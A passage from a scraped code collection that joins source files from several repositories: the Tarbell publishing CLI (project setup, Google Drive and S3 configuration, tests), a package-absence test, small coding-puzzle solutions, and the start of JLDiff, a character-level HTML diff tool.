site.project.CONTEXT_SOURCE_FILE)
print(spreadsheet_url)
except AttributeError:
puts(colored.red("No Google spreadsheet or context source file "
"has been configured.\n"))
return
# Use the webbrowser package to try to open the file whether it's a
# remote URL on the web, or a local file. On some platforms it will
# successfully open local files in the default application.
# This seems preferable to trying to do os detection and calling
# the system-specific command for opening files in default
# applications.
# See
# http://stackoverflow.com/questions/434597/open-document-with-default-application-in-python
webbrowser.open(spreadsheet_url)
def _google_spreadsheet_url(key):
"""
Returns full editing URL for a Google Spreadsheet given its key
"""
return "https://docs.google.com/spreadsheets/d/{key}/edit".format(key=key)
def _context_source_file_url(path_or_url):
"""
Returns a URL for a remote or local context CSV file
"""
if path_or_url.startswith('http'):
# Remote CSV. Just return the URL
return path_or_url
if path_or_url.startswith('/'):
# Absolute path
return "file://" + path_or_url
return "file://" + os.path.join(os.path.realpath(os.getcwd()), path_or_url)
def _newproject(command, path, name, settings):
"""
Helper to create new project.
"""
key = None
title = _get_project_title()
template = _get_template(settings)
# Init repo
git = sh.git.bake(_cwd=path)
puts(git.init())
if template.get("url"):
# Create submodule
puts(git.submodule.add(template['url'], '_blueprint'))
puts(git.submodule.update(*['--init']))
# Create spreadsheet
key = _create_spreadsheet(name, title, path, settings)
# Copy html files
puts(colored.green("\nCopying html files..."))
files = glob.iglob(os.path.join(path, "_blueprint", "*.html"))
for file in files:
if os.path.isfile(file):
dir, filename = os.path.split(file)
if not filename.startswith("_") and not filename.startswith("."):
puts("Copying {0} to {1}".format(filename, path))
shutil.copy2(file, path)
ignore = os.path.join(path, "_blueprint", ".gitignore")
if os.path.isfile(ignore):
shutil.copy2(ignore, path)
else:
empty_index_path = os.path.join(path, "index.html")
open(empty_index_path, "w")
# Create config file
_copy_config_template(name, title, template, path, key, settings)
# Commit
puts(colored.green("\nInitial commit"))
puts(git.add('.'))
puts(git.commit(m='Created {0} from {1}'.format(name, template['name'])))
_install_requirements(path)
# Get site, run hook
with ensure_project(command, args, path) as site:
site.call_hook("newproject", site, git)
# Messages
puts("\nAll done! To preview your new project, type:\n")
puts("{0} {1}".format(colored.green("tarbell switch"), colored.green(name)))
puts("\nor\n")
puts("{0}".format(colored.green("cd %s" % path)))
puts("{0}".format(colored.green("tarbell serve\n")))
puts("\nYou got this!\n")
def _install_requirements(path):
"""
Install a blueprint's requirements.txt
"""
locations = [os.path.join(path, "_blueprint"), os.path.join(path, "_base"), path]
success = True
for location in locations:
try:
with open(os.path.join(location, "requirements.txt")):
puts("\nRequirements file found at {0}".format(os.path.join(location, "requirements.txt")))
install_reqs = raw_input("Install requirements now with pip install -r requirements.txt? [Y/n] ")
if not install_reqs or install_reqs.lower() == 'y':
pip = sh.pip.bake(_cwd=location)
puts("\nInstalling requirements...")
puts(pip("install", "-r", "requirements.txt"))
else:
success = False
puts("Not installing requirements. This may break everything! Vaya con dios.")
except IOError:
pass
return success
def _get_project_name(args):
"""
Get project name.
"""
name = args.get(0)
puts("")
while not name:
name = raw_input("What is the project's short directory name? (e.g. my_project) ")
return name
def _get_project_title():
"""
Get project title.
"""
title = None
puts("")
while not title:
title = raw_input("What is the project's full title? (e.g. My awesome project) ")
return title
def _clean_suffix(string, suffix):
"""
If string endswith the suffix, remove it. Else leave it alone.
"""
suffix_len = len(suffix)
if len(string) < suffix_len:
# the string param was shorter than the suffix
raise ValueError("A suffix can not be bigger than string argument.")
if string.endswith(suffix):
# return from the beginning up to
# but not including the first letter
# in the suffix
return string[0:-suffix_len]
else:
# leave unharmed
return string
def _get_path(name, settings, mkdir=True):
"""
Generate a project path.
"""
default_projects_path = settings.config.get("projects_path")
path = None
if default_projects_path:
path = raw_input("\nWhere would you like to create this project? [{0}/{1}] ".format(default_projects_path, name))
if not path:
path = os.path.join(default_projects_path, name)
else:
while not path:
path = raw_input("\nWhere would you like to create this project? (e.g. ~/tarbell/) ")
return os.path.expanduser(path)
def _mkdir(path):
"""
Make a directory or bail.
"""
try:
os.mkdir(path)
except OSError as e:
if e.errno == 17:
show_error("ABORTING: Directory {0} already exists.".format(path))
else:
show_error("ABORTING: OSError {0}".format(e))
sys.exit()
def _get_template(settings):
"""
Prompt user to pick template from a list.
"""
puts("\nPick a template\n")
template = None
while not template:
_list_templates(settings)
index = raw_input("\nWhich template would you like to use? [1] ")
if not index:
index = "1"
try:
index = int(index) - 1
return settings.config["project_templates"][index]
except:
puts("\"{0}\" isn't a valid option!".format(colored.red("{0}".format(index))))
pass
def _list_templates(settings):
"""
List templates from settings.
"""
for idx, option in enumerate(settings.config.get("project_templates"), start=1):
puts(" {0!s:5} {1!s:36}".format(
colored.yellow("[{0}]".format(idx)),
colored.cyan(option.get("name"))
))
if option.get("url"):
puts(" {0}\n".format(option.get("url")))
def _create_spreadsheet(name, title, path, settings):
"""
Create Google spreadsheet.
"""
if not settings.client_secrets:
return None
create = raw_input("Would you like to create a Google spreadsheet? [Y/n] ")
if create and not create.lower() == "y":
return puts("Not creating spreadsheet.")
email_message = (
"What Google account(s) should have access to this "
"this spreadsheet? (Use a full email address, such as "
"<EMAIL>. Separate multiple addresses with commas.)")
if settings.config.get("google_account"):
emails = raw_input("\n{0}(Default: {1}) ".format(email_message,
settings.config.get("google_account")
))
if not emails:
emails = settings.config.get("google_account")
else:
emails = None
while not emails:
emails = raw_input(email_message)
try:
media_body = _MediaFileUpload(os.path.join(path, '_blueprint/_spreadsheet.xlsx'),
mimetype='application/vnd.ms-excel')
except IOError:
show_error("_blueprint/_spreadsheet.xlsx doesn't exist!")
return None
service = get_drive_api()
body = {
'title': '{0} (Tarbell)'.format(title),
'description': '{0} ({1})'.format(title, name),
'mimeType': 'application/vnd.ms-excel',
}
try:
newfile = service.files()\
.insert(body=body, media_body=media_body, convert=True).execute()
for email in emails.split(","):
_add_user_to_file(newfile['id'], service, user_email=email.strip())
puts("\n{0!s}! View the spreadsheet at {1!s}".format(
colored.green("Success"),
colored.yellow("https://docs.google.com/spreadsheet/ccc?key={0}"
.format(newfile['id']))
))
return newfile['id']
except errors.HttpError as error:
show_error('An error occurred creating spreadsheet: {0}'.format(error))
return None
def _add_user_to_file(file_id, service, user_email,
perm_type='user', role='writer'):
"""
Grants the given set of permissions for a given file_id. service is an
already-credentialed Google Drive service instance.
"""
new_permission = {
'value': user_email,
'type': perm_type,
'role': role
}
try:
service.permissions()\
.insert(fileId=file_id, body=new_permission)\
.execute()
except errors.HttpError as error:
show_error('An error adding users to spreadsheet: {0}'.format(error))
def _copy_config_template(name, title, template, path, key, settings):
"""
Get and render tarbell_config.py.template from Tarbell default.
"""
puts("\nCopying configuration file")
context = settings.config
context.update({
"default_context": {
"name": name,
"title": title,
},
"name": name,
"title": title,
"template_repo_url": template.get('url'),
"key": key,
})
# @TODO refactor this a bit
if not key:
spreadsheet_path = os.path.join(path, '_blueprint/', '_spreadsheet.xlsx')
try:
with open(spreadsheet_path, "rb") as f:
puts("Copying _blueprint/_spreadsheet.xlsx to tarbell_config.py's DEFAULT_CONTEXT")
data = process_xlsx(f.read())
if 'values' in data:
data = copy_global_values(data)
context["default_context"].update(data)
except IOError:
pass
s3_buckets = settings.config.get("s3_buckets")
if s3_buckets:
puts("")
for bucket, bucket_conf in s3_buckets.items():
puts("Configuring {0!s} bucket at {1!s}\n".format(
colored.green(bucket),
colored.yellow("{0}/{1}".format(bucket_conf['uri'], name))
))
puts("\n- Creating {0!s} project configuration file".format(
colored.cyan("tarbell_config.py")
))
template_dir = os.path.dirname(pkg_resources.resource_filename("tarbell", "templates/tarbell_config.py.template"))
loader = jinja2.FileSystemLoader(template_dir)
env = jinja2.Environment(loader=loader)
env.filters["pprint_lines"] = pprint_lines # For dumping context
content = env.get_template('tarbell_config.py.template').render(context)
codecs.open(os.path.join(path, "tarbell_config.py"), "w", encoding="utf-8").write(content)
puts("\n- Done copying configuration file")
def _delete_dir(dir):
"""
Delete a directory.
"""
try:
shutil.rmtree(dir) # delete directory
except OSError as exc:
if exc.errno != 2: # code 2 - no such file or directory
raise # re-raise exception
except UnboundLocalError:
pass
class Command(object):
"""
Class that encapsulates a tarbell command.
"""
COMMANDS = {}
SHORT_MAP = {}
@classmethod
def register(klass, command):
klass.COMMANDS[command.name] = command
if command.short:
for short in command.short:
klass.SHORT_MAP[short] = command
@classmethod
def lookup(klass, name):
if name in klass.SHORT_MAP:
return klass.SHORT_MAP[name]
if name in klass.COMMANDS:
return klass.COMMANDS[name]
else:
return None
@classmethod
def all_commands(klass):
return sorted(klass.COMMANDS.values(),
key=lambda cmd: cmd.name)
def __init__(self, name=None, short=None, fn=None, usage=None, help=None):
self.name = name
self.short = short
self.fn = fn
self.usage = usage
self.help = help
def __call__(self, *args, **kw_args):
return self.fn(*args, **kw_args)
def def_cmd(name=None, short=None, fn=None, usage=None, help=None):
"""
Define a command.
"""
command = Command(name=name, short=short, fn=fn, usage=usage, help=help)
Command.register(command)
# Note that the tarbell_configure function is imported from contextmanagers.py
def_cmd(
name='configure',
fn=tarbell_configure,
usage='configure <subcommand (optional)>',
help="Configure Tarbell. Subcommand can be one of 'drive', 's3', 'path', or 'templates'.")
def_cmd(
name='generate',
fn=tarbell_generate,
usage='generate <output dir>',
help=('Generate static files for the current project. If no output '
'directory specified, Tarbell will raise an error asking for one.'))
def_cmd(
name='install',
fn=tarbell_install,
usage='install <url to project repository>',
help='Install a pre-existing project')
def_cmd(
name='install-blueprint',
fn=tarbell_install_blueprint,
usage='install-blueprint <url to blueprint>',
help='Install a Tarbell blueprint')
def_cmd(
name='install-template',
fn=tarbell_install_blueprint,
usage='install-template <url to blueprint>',
help='Install a Tarbell blueprint (deprecated, use \'tarbell install-blueprint\')')
def_cmd(
name='list',
fn=tarbell_list,
usage='list',
help='List all projects.')
def_cmd(
name='list-templates',
fn=tarbell_list_templates,
usage='list-templates',
help='List installed project templates')
def_cmd(
name='publish',
fn=tarbell_publish,
usage='publish <target (default: staging)>',
help='Publish the current project to <target>.')
def_cmd(
name='newproject',
fn=tarbell_newproject,
usage='newproject <project>',
help='Create a new project named <project>')
def_cmd(
name='serve',
fn=tarbell_serve,
usage='serve <address (optional)>',
help=('Run a preview server (typically handled by \'switch\'). '
'Supply an optional address for the preview server such as '
'\'192.168.56.1:8080\''))
def_cmd(
name='switch',
fn=tarbell_switch,
usage='switch <project> <address (optional)>',
help=('Switch to the project named <project> and start a preview server. '
'Supply an optional address for the preview server such as '
'\'192.168.56.1:8080\''))
def_cmd(
name='credentials',
fn=tarbell_credentials,
usage='credentials',
help=('Display Google OAuth credentials'))
def_cmd(
name='update',
fn=tarbell_update,
usage='update',
help='Update blueprint in current project.')
def_cmd(
name='unpublish',
fn=tarbell_unpublish,
usage='unpublish <target (default: staging)>',
help='Remove the current project from <target>.')
def_cmd(
name='spreadsheet',
fn=tarbell_spreadsheet,
usage='spreadsheet',
help='Open context spreadsheet in your browser or default application')
```
#### File: tarbell/tarbell/configure.py
```python
import os
import sys
import yaml
import shutil
from subprocess import call
from datetime import datetime
from clint.textui import colored, puts
from six.moves import input as raw_input
from tarbell import LONG_VERSION
from .settings import Settings
from .oauth import get_drive_api_from_client_secrets
from .utils import show_error
def tarbell_configure(command, args):
"""
Tarbell configuration routine.
"""
puts("Configuring Tarbell. Press ctrl-c to bail out!")
# Check if there's settings configured
settings = Settings()
path = settings.path
prompt = True
if len(args):
prompt = False
config = _get_or_create_config(path)
if prompt or "drive" in args:
config.update(_setup_google_spreadsheets(config, path, prompt))
if prompt or "s3" in args:
config.update(_setup_s3(config, path, prompt))
if prompt or "path" in args:
config.update(_setup_tarbell_project_path(config, path, prompt))
if prompt or "templates" in args:
if "project_templates" in config:
override_templates = raw_input("\nFound Base Template config. Would you like to override them? [Default: No, 'none' to skip]")
if override_templates and override_templates != "No" and override_templates != "no" and override_templates != "N" and override_templates != "n":
config.update(_setup_default_templates(config, path, prompt))
else:
puts("\nPreserving Base Template config...")
else:
config.update(_setup_default_templates(config, path, prompt))
settings.config = config
with open(path, 'w') as f:
puts("\nWriting {0}".format(colored.green(path)))
settings.save()
if all:
puts("\n- Done configuring Tarbell. Type `{0}` for help.\n"
.format(colored.green("tarbell")))
return settings
def _get_or_create_config(path, prompt=True):
"""
Get or create a Tarbell configuration directory.
"""
dirname = os.path.dirname(path)
filename = os.path.basename(path)
try:
os.makedirs(dirname)
except OSError:
pass
try:
with open(path, 'r+') as f:
if os.path.isfile(path):
puts("{0} already exists, backing up".format(colored.green(path)))
_backup(dirname, filename)
return yaml.load(f)
except IOError:
return {}
def _setup_google_spreadsheets(settings, path, prompt=True):
"""
Set up a Google spreadsheet.
"""
ret = {}
if prompt:
use = raw_input("\nWould you like to use Google spreadsheets [Y/n]? ")
if use.lower() != "y" and use != "":
return settings
dirname = os.path.dirname(path)
path = os.path.join(dirname, "client_secrets.json")
write_secrets = True
if os.path.isfile(path):
write_secrets_input = raw_input("client_secrets.json already exists. Would you like to overwrite it? [y/N] ")
if not write_secrets_input.lower().startswith('y'):
write_secrets = False
if write_secrets:
puts(("\nLogin in to Google and go to {0} to create an app and generate a "
"\nclient_secrets authentication file. You should create credentials for an `installed app`. See "
"\n{1} for more information."
.format(colored.red("https://console.developers.google.com/project"),
colored.red("http://tarbell.readthedocs.org/en/{0}/install.html#configure-google-spreadsheet-access-optional".format(LONG_VERSION))
)
))
secrets_path = raw_input(("\nWhere is your client secrets file? "
"[~/Downloads/client_secrets.json] "
))
if secrets_path == "":
secrets_path = os.path.join("~", "Downloads/client_secrets.json")
secrets_path = os.path.expanduser(secrets_path)
puts("\nCopying {0} to {1}\n"
.format(colored.green(secrets_path),
colored.green(dirname))
)
_backup(dirname, "client_secrets.json")
try:
shutil.copy(secrets_path, os.path.join(dirname, 'client_secrets.json'))
except shutil.Error as e:
show_error(str(e))
# Now, try and obtain the API for the first time
get_api = raw_input("Would you like to authenticate your client_secrets.json? [Y/n] ")
if get_api == '' or get_api.lower().startswith('y'):
get_drive_api_from_client_secrets(path, reset_creds=True)
default_account = settings.get("google_account", "")
account = raw_input(("What Google account(s) should have access to new spreadsheets? "
"(e.g. <EMAIL>, leave blank to specify for each new "
"project, separate multiple addresses with commas) [{0}] "
.format(default_account)
))
if default_account != "" and account == "":
account = default_account
if account != "":
ret = { "google_account" : account }
puts("\n- Done configuring Google spreadsheets.")
return ret
def _setup_s3(settings, path, prompt=True):
"""
Prompt user to set up Amazon S3.
"""
ret = {'default_s3_buckets': {}, 's3_credentials': settings.get('s3_credentials', {})}
if prompt:
use = raw_input("\nWould you like to set up Amazon S3? [Y/n] ")
if use.lower() != "y" and use != "":
puts("\n- Not configuring Amazon S3.")
return ret
existing_access_key = settings.get('default_s3_access_key_id', None) or \
os.environ.get('AWS_ACCESS_KEY_ID', None)
existing_secret_key = settings.get('default_s3_secret_access_key', None) or \
os.environ.get('AWS_SECRET_ACCESS_KEY', None)
access_key_prompt = "\nPlease enter your default Amazon Access Key ID:"
if existing_access_key:
access_key_prompt += ' [%s] ' % existing_access_key
else:
access_key_prompt += ' (leave blank to skip) '
default_aws_access_key_id = raw_input(access_key_prompt)
if default_aws_access_key_id == '' and existing_access_key:
default_aws_access_key_id = existing_access_key
if default_aws_access_key_id:
secret_key_prompt = "\nPlease enter your default Amazon Secret Access Key:"
if existing_secret_key:
secret_key_prompt += ' [%s] ' % existing_secret_key
else:
secret_key_prompt += ' (leave blank to skip) '
default_aws_secret_access_key = raw_input(secret_key_prompt)
if default_aws_secret_access_key == '' and existing_secret_key:
default_aws_secret_access_key = existing_secret_key
ret.update({
'default_s3_access_key_id': default_aws_access_key_id,
'default_s3_secret_access_key': default_aws_secret_access_key,
})
# If we're all set with AWS creds, we can setup our default
# staging and production buckets
if default_aws_access_key_id and default_aws_secret_access_key:
existing_staging_bucket = None
existing_production_bucket = None
if settings.get('default_s3_buckets'):
existing_staging_bucket = settings['default_s3_buckets'].get('staging', None)
existing_production_bucket = settings['default_s3_buckets'].get('production', None)
staging_prompt = "\nWhat is your default staging bucket?"
if existing_staging_bucket:
staging_prompt += ' [%s] ' % existing_staging_bucket
else:
staging_prompt += ' (e.g. apps.beta.myorg.com, leave blank to skip) '
staging = raw_input(staging_prompt)
if staging == '' and existing_staging_bucket:
staging = existing_staging_bucket
if staging != "":
ret['default_s3_buckets'].update({
'staging': staging,
})
production_prompt = "\nWhat is your default production bucket?"
if existing_production_bucket:
production_prompt += ' [%s] ' % existing_production_bucket
else:
production_prompt += ' (e.g. apps.myorg.com, leave blank to skip) '
production = raw_input(production_prompt)
if production == '' and existing_production_bucket:
production = existing_production_bucket
if production != "":
ret['default_s3_buckets'].update({
'production': production,
})
more_prompt = "\nWould you like to add additional buckets and credentials? [y/N] "
while raw_input(more_prompt).lower() == 'y':
## Ask for a uri
additional_s3_bucket = raw_input(
"\nPlease specify an additional bucket (e.g. "
"additional.bucket.myorg.com/, leave blank to skip adding bucket) ")
if additional_s3_bucket == "":
continue
## Ask for an access key, if it differs from the default
additional_access_key_prompt = "\nPlease specify an AWS Access Key ID for this bucket:"
if default_aws_access_key_id:
additional_access_key_prompt += ' [%s] ' % default_aws_access_key_id
else:
additional_access_key_prompt += ' (leave blank to skip adding bucket) '
additional_aws_access_key_id = raw_input(additional_access_key_prompt)
if additional_aws_access_key_id == "" and default_aws_access_key_id:
additional_aws_access_key_id = default_aws_access_key_id
elif additional_aws_access_key_id == "":
continue
# Ask for a secret key, if it differs from default
additional_secret_key_prompt = "\nPlease specify an AWS Secret Access Key for this bucket:"
if default_aws_secret_access_key:
additional_secret_key_prompt += ' [%s] ' % default_aws_secret_access_key
else:
additional_secret_key_prompt += ' (leave blank to skip adding bucket) '
additional_aws_secret_access_key = raw_input(
additional_secret_key_prompt)
if additional_aws_secret_access_key == "" and default_aws_secret_access_key:
additional_aws_secret_access_key = default_aws_secret_access_key
elif additional_aws_secret_access_key == "":
continue
ret['s3_credentials'][additional_s3_bucket] = {
'access_key_id': additional_aws_access_key_id,
'secret_access_key': additional_aws_secret_access_key,
}
puts("\n- Done configuring Amazon S3.")
return ret
def _setup_tarbell_project_path(settings, path, prompt=True):
"""
Prompt user to set up project path.
"""
default_path = os.path.expanduser(os.path.join("~", "tarbell"))
projects_path = raw_input("\nWhat is your Tarbell projects path? [Default: {0}, 'none' to skip] ".format(default_path))
if projects_path == "":
projects_path = default_path
if projects_path.lower() == 'none':
puts("\n- Not creating projects directory.")
return {}
if os.path.isdir(projects_path):
puts("\nDirectory exists!")
else:
puts("\nDirectory does not exist.")
make = raw_input("\nWould you like to create it? [Y/n] ")
if make.lower() == "y" or not make:
os.makedirs(projects_path)
puts("\nProjects path is {0}".format(projects_path))
puts("\n- Done setting up projects path.")
return {"projects_path": projects_path}
def _setup_default_templates(settings, path, prompt=True):
"""
Add some (hardcoded) default templates.
"""
project_templates = [{
"name": "Basic Bootstrap 3 template",
"url": "https://github.com/tarbell-project/tarbell-template",
}, {
"name": "Searchable map template",
"url": "https://github.com/tarbell-project/tarbell-map-template",
}, {
"name": "Tarbell template walkthrough",
"url": "https://github.com/tarbell-project/tarbell-tutorial-template",
}]
for project in project_templates:
puts("+ Adding {0} ({1})".format(project["name"], project["url"]))
puts("\n- Done configuring project templates.")
return {"project_templates": project_templates}
def _backup(path, filename):
"""
Backup a file.
"""
target = os.path.join(path, filename)
if os.path.isfile(target):
dt = datetime.now()
new_filename = ".{0}.{1}.{2}".format(
filename, dt.isoformat(), "backup"
)
destination = os.path.join(path, new_filename)
puts("- Backing up {0} to {1}".format(
colored.cyan(target),
colored.cyan(destination)
))
shutil.copy(target, destination)
```
#### File: tarbell/tarbell/errors.py
```python
import string
class MergedCellError(Exception):
def __init__(self, sheetname, ranges):
"""
Translate merged cells to human readable ranges.
"""
self.sheetname = sheetname
self.ranges = ranges
self.bad_ranges = []
letters = string.lowercase
for range in self.ranges:
row1, row2, col1, col2 = range
col1 = letters[col1]
col2 = letters[col2 - 1]
row1 = row1 + 1
self.bad_ranges.append(
"{0}{1}:{2}{3}".format(col1, row1, col2, row2))
def __str__(self):
return ("Merged cells found in worksheet '{0}' in ranges {1}"
.format(self.sheetname, ", ".join(self.bad_ranges)))
```
#### File: tarbell/tarbell/s3.py
```python
import hashlib
import gzip
import mimetypes
import os
import shutil
import sys
import tempfile
from boto.exception import S3ResponseError
from boto.s3.connection import S3Connection, OrdinaryCallingFormat
from boto.s3.key import Key
from clint.textui import puts
from .utils import show_error
GZIP_TIMESTAMP = 326073600 # Timestamp of Eads' birthday
class S3Url(str):
"""
Encapsulates an S3 URL
"""
def __new__(self, content):
# Parse
if not content.endswith("/"):
content = "{0}/".format(content)
if content.startswith("s3://"):
content = content[5:]
self.root, self.path = content.split("/", 1)
return str.__new__(self, content.rstrip("/"))
class S3Sync:
"""
Encapsulate syncing a directory with S3
"""
def __init__(self, directory, bucket, access_key_id, secret_access_key, force=False):
if '.' in bucket:
connection = S3Connection(access_key_id, secret_access_key, calling_format=OrdinaryCallingFormat())
else:
connection = S3Connection(access_key_id, secret_access_key)
self.force = force
self.bucket = bucket
self.directory = directory.rstrip('/')
try:
self.connection = connection.get_bucket(bucket.root)
except S3ResponseError as e:
show_error("S3 error! See below:\n")
puts("{0}\n".format(str(e)))
sys.exit()
def deploy_to_s3(self):
"""
Deploy a directory to an s3 bucket.
"""
self.tempdir = tempfile.mkdtemp('s3deploy')
for keyname, absolute_path in self.find_file_paths():
self.s3_upload(keyname, absolute_path)
shutil.rmtree(self.tempdir, True)
return True
def s3_upload(self, keyname, absolute_path):
"""
Upload a file to s3
"""
mimetype = mimetypes.guess_type(absolute_path)
options = {'Content-Type': mimetype[0]}
if mimetype[0] is not None and mimetype[0].startswith('text/'):
upload = open(absolute_path, 'rb')
options['Content-Encoding'] = 'gzip'
key_parts = keyname.split('/')
filename = key_parts.pop()
temp_path = os.path.join(self.tempdir, filename)
gzfile = gzip.GzipFile(temp_path, 'wb', 9, None, GZIP_TIMESTAMP)
gzfile.write(upload.read())
gzfile.close()
absolute_path = temp_path
hash = '"{0}"'.format(hashlib.md5(open(absolute_path, 'rb').read()).hexdigest())
key = "{0}/{1}".format(self.bucket.path, keyname)
existing = self.connection.get_key(key)
if self.force or not existing or (existing.etag != hash):
k = Key(self.connection)
k.key = key
puts("+ Uploading {0}/{1}".format(self.bucket, keyname))
k.set_contents_from_filename(absolute_path, options, policy='public-read')
else:
puts("- Skipping {0}/{1}, files match".format(self.bucket, keyname))
def find_file_paths(self):
"""
A generator function that recursively finds all files in the upload directory.
"""
paths = []
for root, dirs, files in os.walk(self.directory, topdown=True):
rel_path = os.path.relpath(root, self.directory)
for f in files:
if rel_path == '.':
path = (f, os.path.join(root, f))
else:
path = (os.path.join(rel_path, f), os.path.join(root, f))
paths.append(path)
return paths
```
#### File: tarbell/tests/test_barebones.py
```python
import filecmp
import os
from tarbell.app import EXCLUDES, TarbellSite
TESTS_DIR = os.path.dirname(__file__)
PATH = os.path.realpath(os.path.join(TESTS_DIR, 'examples/barebones'))
BUILT = os.path.join(PATH, '_site')
PROJECT_NAME = "barebones"
def test_get_site():
site = TarbellSite(PATH)
assert os.path.realpath(site.path) == os.path.realpath(PATH)
assert site.project.name == PROJECT_NAME
def test_default_excludes():
"Ensure a basic set of excluded files"
site = TarbellSite(PATH)
assert set(site.project.EXCLUDES) == set(EXCLUDES)
```
#### File: tarbell/tests/test_build_site.py
```python
import filecmp
import os
import pytest
from tarbell.app import TarbellSite
EXAMPLES_DIR = os.path.realpath(os.path.join(os.path.dirname(__file__), 'examples'))
TEST_SITES = [os.path.join(EXAMPLES_DIR, d) for d in os.listdir(EXAMPLES_DIR)]
@pytest.mark.parametrize('path', TEST_SITES)
def test_site(path, tmpdir):
"""
Test that sites in the examples/ directory build correctly
"""
site = TarbellSite(path)
assert os.path.realpath(site.path) == os.path.realpath(path)
# build the site
site.generate_static_site(str(tmpdir))
# compare directories
built = os.path.join(path, '_site')
comp = filecmp.dircmp(built, str(tmpdir))
assert set(comp.same_files) == set(os.listdir(built))
```
|
{
"source": "jeduardo/packages-formula",
"score": 2
}
|
#### File: packages-absent/testinfra/test_packages_absent.py
```python
import pytest
@pytest.mark.parametrize("name,sample_file", [
("nano", "/bin/nano")
])
def test_package_is_not_installed(host, name, sample_file):
assert not host.exists(sample_file)
```
|
{
"source": "jedubz/daily-coding-problem",
"score": 4
}
|
#### File: problems_0_99/problem_1/product.py
```python
input1 = [1, 2, 3, 4, 5]
expected1 = [120, 60, 40, 30, 24]
input2 = [3, 2, 1]
expected2 = [2, 3, 6]
def recurs(newInput):
if newInput:
n = newInput.pop()
return n * recurs(newInput)
else:
return 1
def product(input):
result = []
for i in range(len(input)):
iInput = list(input)
iInput.pop(i)
val = recurs(iInput)
result.append(val)
return result
actual1 = product(input1)
actual2 = product(input2)
print(actual1 == expected1)
print(actual2 == expected2)
```
#### File: problems_0_99/problem_3/missing_posint.py
```python
testcase1 = [3, 4, -1, 1]
testcase2 = [1, 2, 0]
testcase3 = [3, 5, 6]
expected1 = 2
expected2 = 3
expected3 = 1
def find_missing_pos_int(arr):
lowest_pos_int = 1
for i in arr:
if (int_is_pos(i)):
if (i < lowest_pos_int+1):
lowest_pos_int = lowest_pos_int+1
return lowest_pos_int
def int_is_pos(number):
return number > 0
actual1 = find_missing_pos_int(testcase1)
actual2 = find_missing_pos_int(testcase2)
actual3 = find_missing_pos_int(testcase3)
print("Actual1: " + str(actual1))
print("Actual2: " + str(actual2))
print("Actual3: " + str(actual3))
assert actual1 == expected1
print("Passed")
assert actual2 == expected2
print("Passed")
assert actual3 == expected3
print("Passed")
```
|
{
"source": "JEdward7777/JLDiff",
"score": 2
}
|
#### File: JEdward7777/JLDiff/JLDiff.py
```python
from __future__ import with_statement
from collections import defaultdict
import sys
import cgi
import codecs
if hasattr( cgi, "escape" ):
cgi_escape = cgi.escape
else:
import html
cgi_escape = html.escape
STATE_PASSING_1ST = 0
STATE_PASSING_2ND = 1
STATE_MATCH = 2
class lineCompIndex(object):
__slots__ = ['errorCount', 'previous', 'state', 'content' ]
def __init__( self ):
self.errorCount = 0
self.previous = None
self.state = STATE_PASSING_1ST
self.content = ""
u_intern_dict = {}
def u_intern( value ):
if value in u_intern_dict:
return u_intern_dict[value]
u_intern_dict[value]=value
return value
def main( argv ):
filename1 = None
filename2 = None
output = None
same_size = False
for arg in argv:
if arg.startswith( "-" ):
if arg == "--same_size":
same_size = True
else:
raise Exception( "Unknown arg " + arg )
else:
if not filename1:
filename1 = arg
elif not filename2:
filename2 = arg
elif not output:
output = arg
else:
raise Exception( "Extra argument " + arg )
if not filename1 or not filename2 or not output:
print( "Usage: JLDiff file1 file2 resultFile [--same_size]" )
exit(1)
with codecs.open( filename1, 'r', 'utf-8', errors='ignore' ) as fileHandle1:
with codecs.open( filename2, 'r', 'utf-8', errors='ignore' ) as fileHandle2:
file1 = fileHandle1.read()
file2 = fileHandle2.read()
lastLine = []
thisLine = []
#init the root root
thisIndex = lineCompIndex()
thisIndex.state = STATE_MATCH
thisLine.append( thisIndex )
#init the root top case
columnIndex = 1
for char2 in file2:
thisIndex = lineCompIndex()
thisIndex.previous = thisLine[ columnIndex-1 ]
thisIndex.errorCount = thisIndex.previous.errorCount+1
thisIndex.content = u_intern(char2)
thisIndex.state = STATE_PASSING_2ND
thisLine.append( thisIndex )
columnIndex += 1
for char1 in file1:
lastLine = thisLine
thisLine = []
try:
sys.stdout.write( char1 )
except Exception:
pass
#init the root left case
thisIndex = lineCompIndex()
thisIndex.previous = lastLine[ 0 ]
thisIndex.errorCount = thisIndex.previous.errorCount+1
thisIndex.content = u_intern(char1)
thisIndex.state = STATE_PASSING_1ST
thisLine.append( thisIndex )
columnIndex = 1
for char2 in file2:
thisIndex = lineCompIndex()
if( char2 == char1 ):
thisIndex.previous = lastLine[ columnIndex-1 ]
#To keep from getting speriouse single matches,
#see about adding some error in for the first matches.
if thisIndex.previous.state == STATE_MATCH:
thisIndex.errorCount = thisIndex.previous.errorCount
else:
thisIndex.errorCount = thisIndex.previous.errorCount #+ 1
thisIndex.state = STATE_MATCH
thisIndex.content = u_intern(char2)
else:
if lastLine[ columnIndex ].errorCount < thisLine[ columnIndex-1 ].errorCount:
thisIndex.previous = lastLine[ columnIndex ]
thisIndex.content = u_intern(char1)
thisIndex.state = STATE_PASSING_1ST
else:
thisIndex.previous = thisLine[ columnIndex-1 ]
thisIndex.content = u_intern(char2)
thisIndex.state = STATE_PASSING_2ND
thisIndex.errorCount = thisIndex.previous.errorCount+1
thisLine.append( thisIndex )
columnIndex += 1
def printDiffs( nodesToPrint, outputFile ):
isblack = True
isred = False
isgreen = False
def escape( inputStr ):
answer = ""
if inputStr == " ":
answer = " "
elif inputStr == "\t":
answer = " "
else:
answer = cgi_escape( inputStr )
return answer
for nodeToPrint in nodesToPrint:
if nodeToPrint.content == "\n":
outputFile.write( "<br>\n" )
else:
if(nodeToPrint.state == STATE_MATCH):
if not isblack:
outputFile.write( "</span>" )
isblack = True
isred = False
isgreen = False
elif(nodeToPrint.state == STATE_PASSING_2ND ):
if not isred:
if not isblack:
outputFile.write( "</span>" )
outputFile.write( "<span class='new'>" )
isblack = False
isred = True
isgreen = False
else:
if not isgreen:
if not isblack:
outputFile.write( "</span>" )
outputFile.write( "<span class='old'>" )
isblack = False
isred = False
isgreen = True
outputFile.write( escape( nodeToPrint.content ) )
if not isblack:
outputFile.write( "</span>" )
isblack = True
isred = False
isgreen = False
backwardsList = []
currentNode = thisLine[ len( thisLine )-1 ]
while not currentNode is None:
backwardsList.append( currentNode )
currentNode = currentNode.previous
with codecs.open( output, 'w', 'utf-8', errors='ignore' ) as outFile:
outFile.write( "<!DOCTYPE html>\n" )
outFile.write( "<html>\n" )
outFile.write( "<head>\n" )
